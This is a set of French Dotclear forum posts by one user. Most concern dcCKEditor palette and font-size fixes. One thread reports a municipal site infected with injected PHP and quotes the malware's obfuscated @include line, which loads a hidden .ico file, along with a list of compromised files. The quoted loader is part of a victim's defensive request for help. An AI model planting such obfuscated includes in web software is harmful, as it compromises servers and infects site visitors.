Dotclear

Vous n'êtes pas identifié(e).

Annonce

#1 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-06-01 15:17:52

Ah, merci Philippe !
Ça marche en effet ! C’est amusant, je me disais qu’en CSS, il existait cette fonction « important » pour imposer un style, je n’ai pas osé l’appliquer sur du JS comme ça ?
On apprend tous les jours !
Encore merci !

#2 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-06-01 12:22:23

Je reviens vers vous, l’astuce très simple de Philippe avec tidyAdmin ne fonctionne plus avec la version 2.16.8 ni sur les futurs version 2.17 d'ailleurs

C’est dommage, il permettait de régler simplement le problème ? Et je n’arrive pas à trouver le code à modifier, c’est au-delà de mes compétences ?

Est-il possible de remédier au problème ?

#3 Re : [dc2] Plugins » [ Plugin ] HomePageMode2 » 2020-05-29 08:31:19

Merci de vos réponses,
j'ai fait la mise à jour, effectivement ça marche à priori…

#4 Re : [dc2] Plugins » [ Plugin ] HomePageMode2 » 2020-05-27 18:00:27

Bonjour,
Petite question avant de faire des bêtises !
J’ai des blogues (en version 2.15) à mettre à jour qui utilisent homePageMode2. Si je mets à jour Dotclear à la version 2.16, le plugin fonctionnera-t-il encore ou aurais-je la nécessité (ou l’avantage) de le remplacer par la nouvelle fonction « page d’accueil statique » de cette version de Dotclear… Si Franck m’entend ?

#5 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-05-27 17:43:34

J’ai testé la version 2.16.7
Sauf erreur, en réglant : Mes préférences → Mes options → Taille de police de caractère, sur « Défaut », le réglage de CKEditor est toujours aussi petit qu’avant ; si je règle sur « Grand », la taille des caractères du contenu des billets augmente bien, alors qu’avant est restait inchangée.

Pour les versions futures, je pense que cette taille par « défaut » soit au moins identique à la taille des titres (et non si petite), comme c’était avant…
Qu’en pensez-vous ?

PS : Ah ! je viens de voir qu’il y a une version 2.16.8, j’ai du mal à suivre… Ah, ces jeunes !… J’y retourne immédiatement !

#6 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-05-26 19:53:45

Merci de vos réponses…

J’ai essayé la manip de Philippe avec le plugin tidyAdmin que je ne connaissais pas, et bien ça semble fonctionner avec la version en développement 2,17 de Dotclear, que je teste en ce moment ?
Je vais essayer sur la version 2.16…

Pour retrouver la taille d’origine qui m’allait bien, j’ai réglé à 1.1em ou 1em (c’est vrai que d’avoir une taille réglable à sa vue est un plus appréciable, surtout quand on a des billets très fournis en texte, ça facilite la relecture).

La version de CKEditor actuelle en service correspondrait à 0.85em à peu près.

Je m’excuse de provoquer cette énième correction, Franck ! Si tu estimes ce réglage facile à ajouter, ça sera parfait ! Et encore merci pour votre célérité !

#7 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-05-26 13:47:33

Je crois que le problème vient de CKEditor qui comme pour les palettes, a réduit sa voilure et la taille du texte d’écriture, histoire de rajeunir leur produit, je suppose ? C’est curieux cette dégradation de la qualité, un peu partout… moi même je le sens, je me dégrade aussi, probablement ce phénomène d’entropie… voyez bien, je radote…

#8 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-05-26 07:31:26

Bonjour nanard,

Merci de votre réponse, j’ai installé le plugin, mais je ne vois rien qui augmente la taille des polices dans le champ « contenu » des billets avec dcCKEditor uniquement ?
Ou je n’ai pas trouvé ?? Suis-je déjà gâteux ?
Le souci n'est que en mode administration, pas en accès public !

#9 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-05-25 18:52:00

Bonjour,
Je reviens à nouveau vers vous, le problème de la palette de couleur étant résolu avec élégance, non pas pour les palettes, mais à cause de la taille des caractères du contenu et extraits des billets dans la dernière version de dcCKEditor ; ils sont réduits d’un à deux points par rapport à la version de dcCKEditor avec l’ancienne palette que je rajoutais toujours avant que Franck modifie celle-ci. Cette version de dcCKEditor avait une taille de police presque identique celle du titre, le contenu étant d’un demi-point plus gros. Cet ajustement était parfait pour mes yeux et mon « grand âge » où la lunette devient un ustensile obligatoire.

Je n’arrive pas à utiliser la version actuelle de dcCKEditor, à cause de ces caractères trop petits, sinon à me bousiller les yeux et jongler en permanence avec le zoom du navigateur Firefox, ce qui devient pénible !

Je n’ai pas trouvé d’autre solution que de remettre ma bidouille de l’ancien dcCKEditor, pour avoir une taille de contenu « visible » comme avant !

Au risque de passer pour un vieux con pour les jeunes qui n’utilisent pas encore de lunettes pour voir de près, y aurait-il moyen de permettre comme pour les palettes, d’avoir une préférence pour modifier la taille des polices de contenu et extrait ? Ce serait bien pour les vieux comme moi ou les handicapés ?

Ou alors, il y a un réglage qui m’échappe ?

PS, pour Franck : je teste la version 2.17 comme il me l’a indiqué et je trouve la mémorisation des options d’affichage des billets comme étant le réglage idéal ! Bravo d’y avoir pensé ! Et les options de palettes parfaites !

#10 Re : [dc2] Migration et mises à jour » Dotclear 2.16 » 2020-04-25 21:11:01

Bonjour,
effectivement, j’ai pu reproduire le bug constaté par wcs

Version Dotclear 2.16.4.

dcLegacyEditor activé pour le formatage xhtml et wiki

dcCKeditor désactivé

Un billet rédigé en wiki, la fenêtre d’enregistrement s’affiche toujours si pas enregistré !
C’est uniquement en rédigeant les contenus en xhtml avec dcLegacyEditor que le bug survient, à la modification du contenu, si l’on oublie d’enregistrer, la fenêtre d’alerte ne s’affiche pas et la modif est perdue ! Même soucies dans les extraits !

D’autres points seraient à tester, pendant qu’on y est ?

#11 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-04-17 14:11:46

Merci Franck,

Le bug d'enregistrement semble corrigé ! Je test !

Pour les palettes c'est un bon compromis, effectivement, et en plus grand, pourquoi pas ?

Pour éviter de perturber les habitudes, et esthétiquement, je pense qu'il faudrait laisser en permanence le code d'alignement : CKEDITOR.config.colorButton_colorsPerRow = 8;

Je l'ai ajouté pour moi en tout cas.

Encore merci pour la réactivité !

#12 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-04-17 11:24:18

Bonjour Nikrou,
Merci de te pencher sur le problème.
Pour retrouver l'alignement correct, j'ai indiqué le code à modifier dans ckeditor.js au post #6

Si ça peut t'aider !

#13 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-04-16 18:14:30

Bon, la manip de changer la palette directement dans dotclear/plugins/dcCKEditor/js/ckeditor/ckeditor.js
s'avère plus simple que ma bidouille empirique, il fallait savoir exactement où aller.

Pour ceux que cela intéresse, pour retrouver l'ancienne palette, il faut effectuer deux copier/coller de code dans ckeditor.js

Pour retrouver l'alignement correct, remplacer :

for(var i=0;i<colors.length;i++){if((i%colorsPerRow)===0)

par

for(var i=0;i<colors.length;i++){if((i%8)===0)

et un peu plus loin, remplacer la mauvaise palette :

config.colorButton_colors='1ABC9C,2ECC71,3498DB,9B59B6,4E5F70,F1C40F,'
+'16A085,27AE60,2980B9,8E44AD,2C3E50,F39C12,'+'E67E22,E74C3C,ECF0F1,95A5A6,DDD,FFF,'
+'D35400,C0392B,BDC3C7,7F8C8D,999,000'

par la bonne palette :

config.colorButton_colors='000,800000,8B4513,2F4F4F,008080,000080,4B0082,696969,'
+'B22222,A52A2A,DAA520,006400,40E0D0,0000CD,800080,808080,'
+'F00,FF8C00,FFD700,008000,0FF,00F,EE82EE,A9A9A9,'
+'FFA07A,FFA500,FFFF00,00FF00,AFEEEE,ADD8E6,DDA0DD,D3D3D3,'
+'FFF0F5,FAEBD7,FFFFE0,F0FFF0,F0FFFF,F0F8FF,E6E6FA,FFF'

A priori c'est plus propre de procéder ainsi, sauf erreur de ma part.

Merci à Franck et Philippe de m'avoir aiguillé vers une solution relativement simple.

Pour l'intégration de cette modification avec dcCKEditorAddons, je n'ai pas les compétences nécessaires pour savoir coder un champ à insérer ?

#14 Re : [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-04-16 14:58:31

Merci de vos réponses,

Je vais testé la manip de Philippe, je vous tiendrais au courant !

#15 [dc2] Plugins » plugin dcCKEditor : régression de la palette de couleur de fond » 2020-04-15 20:03:58

caspal
Réponses : 30

Bonjour,
La mise à jour de Dotclear 2.16.1 qui semble poser quelques soucis avec dcCKEditor, où la fenêtre d'alerte d'enregistrement ne s'affiche plus si l’on a oublié d'enregistrer le billet. L'ayant signalé à Franck, ce serait dû à un bug avec dcCKEditor.

Je profite de ce problème pour soumettre un point qui m'agace depuis longtemps avec les dernières mises à jour de Dotclear et dcCKEditor où la palette de couleur des boutons pour changer la couleur du texte et la couleur de fond du texte utilise une nouvelle palette en régression et totalement inutilisable pour  moi, alors qu'au début de l'ajout de cette palette (vers les versions 2.12 de Dotclear je crois), la gamme de couleurs était parfaite avec des dégradés cohérents.
Je suis obligé, à chaque mise à jour de Dotclear, de bidouiller pour retrouver cette ancienne palette à partir d'une version ancienne de dcCKEditor. Je ne vais pas pouvoir le faire indéfiniment sans tout faire buger ? (J'ai refait la bidouille avec la 2.16.1, ça semble encore fonctionner ?)

Ma question est : serait-il possible de réintégrer cette palette ?

Liens vers ancienne palette (parfaite) :
Ancienne palette

et la nouvelle, (horrible !) :
Nouvelle palette

#16 Re : [dc2] Installation et hébergement » Intrusion de codes malicieux dans dotclear » 2020-01-08 11:19:37

En lançant une analyse d'un des fichiers les plus corrompues de l'infection : www/dotclear/inc/core_error.php
avec l'aide de « virustotal.com », pas moins de 6 moteurs antivirus ont signalé un cheval de Troie de type : TrojWare.PHP.Crypt.BL@8c4feo

#17 Re : [dc2] Installation et hébergement » Intrusion de codes malicieux dans dotclear » 2020-01-08 10:59:52

À titre informatif, je vous renvoie ce lien vers un article de 2018 abordant une infection très similaire à celle que j'ai constatée. Elle confirme l'usage de fichiers .php et .ico pour infecter le serveur :

https://forums.cnetfrance.fr/topic/1409 … o-amp-php/

#18 Re : [dc2] Installation et hébergement » Intrusion de codes malicieux dans dotclear » 2020-01-08 10:46:01

Deux nuits sans infections constatées depuis ma dernière intervention. A priori, tout se déclenchait bien depuis les fichiers introduits dans Dotclear.

Merci encore de votre aide !

#19 Re : [dc2] Installation et hébergement » Intrusion de codes malicieux dans dotclear » 2020-01-06 17:54:54

Après un scannage de tous les fichiers de Dotclear, voici la liste des documents contaminés :

Fichiers infectés :
www/blog/themes/customCSS/_config.php
www/blog/plugins/eventHandler/_install.php
www/blog/plugins/eventHandler/inc/class.eventhandler.public.widgets.php
www/dotclear/inc/core_error.php
www/dotclear/inc/admin/lib.themeconfig.php
www/dotclear/plugins/tags/tag_posts.php
www/index.php
www/dotclear/index.php
www/dotclear/admin/index.php
www/blog/plugins/sitemaps/index.php

Fichiers index.php et autres noms, ajoutés :
www/dotclear/themes/index.php
www/dotclear/public/index.php
www/dotclear/locales/index.php
www/dotclear/plugins/index.php
www/blog/plugins/index.php
www/blog/public/index.php
www/blog/themes/index.php
www/blog/index.php
www/dotclear/db/index.php
www/dotclear/inc/index.php
www/dotclear/var/index.php
www/blog/plugins/typo/locales/tepqocta.php
www/dotclear/plugins/simpleMenu/js/ttaxqial.php
www/dotclear/themes/default/wgkxavli.php
www/blog/themes/berlin/scss/yuobayqf.php
www/dotclear/plugins/blowupConfig/js/qrywvlzm.php
www/blog/plugins/externalLinks/fkpmwqmm.php
www/blog/plugins/externalLinks/tpl/guxlhjkr.php
www/dotclear/inc/dbschema/hssiqrvx.php
www/blog/plugins/externalLinks/tpl/amnhcbec.php
www/blog/themes/freelancer/tpl/awnzhkhr.php
www/blog/themes/berlin/scripts/bfkcozrx.php
www/blog/plugins/GalleryInsert/bkyevxms.php

Ainsi que des faux documents images invisibles au format .ico contenant un code à activer probablement après une action à distance :
www/blog/public/documents/.7de4ed1e.ico
www/blog/public/vie_municipale/.26b5aa4f.ico

Une nouvelle installation propre du site a été effectuée et j’attends de voir si cela va tenir (l’attaque se produit généralement dans la nuit).

J’ai conservé les fichiers contaminés et les tiens à votre disposition au cas où cela pourrait servir à améliorer la sécurité de Dotclear.

Je vous remercie de votre aide, cela m’a aidé à confirmer ce que je soupçonnais plus ou moins et je vous tiendrai au courant des éventuelles autres contaminations.

#20 Re : [dc2] Installation et hébergement » Intrusion de codes malicieux dans dotclear » 2020-01-05 13:04:04

Il n’y a plus rien de Drupal sur le serveur depuis plusieurs jours déjà, et le code malicieux a été réintroduit dans Dotclear hier vers 23h, c’est à dire toujours les jours une réinjection est faite.

Peut-on renforcé Dotclear avec un .htaccess ? ou dois-je le réinstaller encore une fois ?

A priori l’accès au serveur ne semble pas se faire par mode FTP ? Les logs ne me disent rien là-dessus ?

Que puis-je demander à OVH de vérifier au niveau du serveur ?

Je vais nettoyer la base Mysql et ne laisser que les registres de Dotclear.

J’ai trouvé un article sur le sujet préconisant un renforcement du code au niveau du serveur apache :
https://secupress.me/fr/blog/naidez-pas … index-php/

Qu’en pensez-vous ?

J’ai ajouté à l'installation du site les plugins suivant :
Contactez-moi (contactMe) 1.8.1
Colorbox (colorbox) 3.1
clean:config (cleanConfig) 1.4.3
EventHandler (eventHandler) 2019.04.05
externalLinks 3.4.0
GalleryInsert 0.412
homePageMode2 0.9-beta
Picture Title Update (pictureTitleUpdater) 0.2
Thumbnails Generator (thumbnailsGenerator) 0.9.1.1
Sitemaps (sitemaps) 1.3.3
Typo 1.9
Versions Manager 0.1.1

J’ai des doutes sur sitemao et EventHandler qui étaient fortement infectés pas ce code php malicieux (j'ai gardé les fichiers index.php concernés) ?

Merci de votre aide.

#21 Re : [dc2] Installation et hébergement » Intrusion de codes malicieux dans dotclear » 2020-01-04 11:01:29

Merci de votre réponse.
Effectivement, le site de la mairie était sur le cms Drupal, une vieille version qui est restée en activité jusqu'au basculement sur Dotclear il y a un mois et demi. Pendant la préparation de la mise à jour, Dotclear était en accès non public pendant un an à peu près, le temps que les gens de la mairie apprennent à s'en servir et transfèrent les nouvelles données dessus.
Après le basculement j'ai désactivé Drupal, sans le supprimer tout de suite. Ce n'est qu'après m'être aperçu des intrusions que j'ai supprimé les fichiers de Drupal et vidé la base Mysql des données correspondantes.
Il ne reste sur la base de données Mysql, que les données d'un vieux logiciel de la bibliothèque municipale, et celles de Dotclear, mais il n'y plus rien sur le serveur de l'hébergement le concernant. J'attends de pouvoir contacter les gens s'occupant de la bibliothèque, pour pouvoir enlever les données.

Pensez-vous que la base Mysql serve de relais pour les intrusions ?

#22 [dc2] Installation et hébergement » Intrusion de codes malicieux dans dotclear » 2020-01-03 21:33:59

caspal
Réponses : 12

Bonjour et meilleurs vœux à tous !
Depuis quelques semaines, le site web d’une petite mairie dont je m’occupe est attaqué par des intrusions de code malicieux dans Dotclear. Ce site est hébergé chez OVH.
À presque tous les niveaux, un fichier « index.php » est introduit, quand le fichier « index.php » existe déjà, ce même code est introduit au début  :

<?php
/*77a56*/

@include "\057home\057ache\162es/w\167w/bl\157g/pu\142lic/\166ie_m\165nici\160ale/\05626b5\141a4f.\151co";

/*77a56*/

(l’include est parfois très long, j’ai gardé en archive une partie des codes malicieux si nécessaire)

Ce fichier « index.php » trouvé même dans le dossier « dotclear/inc/ »   contenant « config.php ».

J’ai effacé à plusieurs reprises ce code et ces « index.php » indésirables, j’ai modifié le code d’accès FTP du site et le mot de passe de la base Mysql, réinstallé un Dotclear clean, mais le code est réinjecté quelques heures après. La dernière intrusion date d’aujourd’hui vers 19h.

Je viens de modifier le code d’accès administratif webmaster de dotclear.
Trois personnes mettent à jour le site, dont moi, au niveau webmaster. Je vais demander à effectuer dès que possible un scan antivirus sur les machines des autres administrateurs, au cas où ils seraient infectés. Je n’ai rien trouvé de douteux chez moi, pour l’instant ?

J’ai vérifié les logs d’accès FTP sur le panel d’OVH, sauf erreur de ma part, je ne vois rien d’une intrusion externe, sauf mes corrections et ajouts.

En cherchant sur le web une solution, j’ai ajouté aux divers fichiers .htaccess le code suivant :

 Options All -Indexes 

Il permettrait d’éviter le scan des contenues (ce serait plus fort qu’un simple fichier index.html vide), mais cela semble inutile ?

D’ailleurs là où j’ai mis un fichier « index.html » vide, il a été rebaptisé au moment de l'intrusion « index.html.bak.bak » et un fichier « index.php » ajouté à la place avec le code malicieux.

Depuis tous les réglages déjà cités, cela n’a rien changé. Je ne sais plus quoi faire.

Des personnes ayant visité le site à partir d’ordinateurs Windows ou Mac, ont eu des pages de pubs à la place de celles du site. Une personne ayant visité le site m’a appelée, après un scan de son ordinateur, elle avait un virus sur un installeur flashplayer ?

Je n’ai rien trouvé d’approchant sur ce problème dans le forum, sauf de vieux messages approchants datant de plus de sept ans, et sur le web, pareils, des intrusions sur WordPress datant aussi de plusieurs années.

Je ne vois pas où se situe la faille, pouvez-vous m’aider ?

#23 Re : [dc2] Questions et aide » Apparition d'un figcaption depuis mise à jour 2.8 » 2015-11-15 20:04:42

Bonjour, pour ma part, j'ai modifié directement le code inséré par le plugin dcCKEditor dans sont fichier « popup_media.js » qui est dans le dossier js.
A la ligne 3, où est indiqué :

center:'margin: 0 auto; display: block;'

je le remplace par :

center:'text-align:center; display: block;'

et cela fonctionne très bien et m'évite de modifier la feuille de style du thème.

Oui je sais, c'est pas bien de modifié une extension de dotclear, mais si vous êtes pressé c'est une solution.

#24 Re : [dc2] Installation et hébergement » Onglets "ajouter des plugins" et "des thèmes" n'apparaissent pas » 2014-05-21 22:40:00

ENFIN !

OVH a réussi à me déblacklister l'adresse cette après-midi.
Tout fonctionne correctement maintenant.
J'y croyais plus…

40 jours pour trouver, pffff !

La cause exacte ne m'a pas été donnée, mais bon… je ne vais pas les accabler…

#25 Re : [dc2] Installation et hébergement » Onglets "ajouter des plugins" et "des thèmes" n'apparaissent pas » 2014-05-19 09:48:15

Donc pour résumé :
- OVH voit bien que l'adresse update.dotaddict.org est blacklistée sur cet hébergement, mais renvoie la faute à Dotclear, au final.
Ou plutôt, leur service d'incidents demande à leur service "abuse" qui redemande à Dotclear d'arrêter… de bloquer.
- Dotclear ne voit pas de blacklistage sur ses serveurs et considère que le problème vient de OVH.

On tourne en rond, malgré que l'on voie bien que ça bloque !
Cherchez l’intrus ?

Toutefois, j'ai constaté hier, à la racine de l'hébergement (avant le répertoire www) qu'un fichier nommé .bash_history est apparue. Il contient le code suivant :

ls -al
dig update.dotaddict.org
ping update.dotaddict.org
wget http://update.dotaddict.org/dc2/plugins.xml

Je n'ai pas ça sur les autres hébergements du même type. Je l'ai désactivé, sans effet et remis ensuite. Je crois que c'est un ficher de test ? Je demande à OVH.

Vous n'êtes pas identifié(e).

Pied de page des forums

Propulsé par FluxBB

Sites map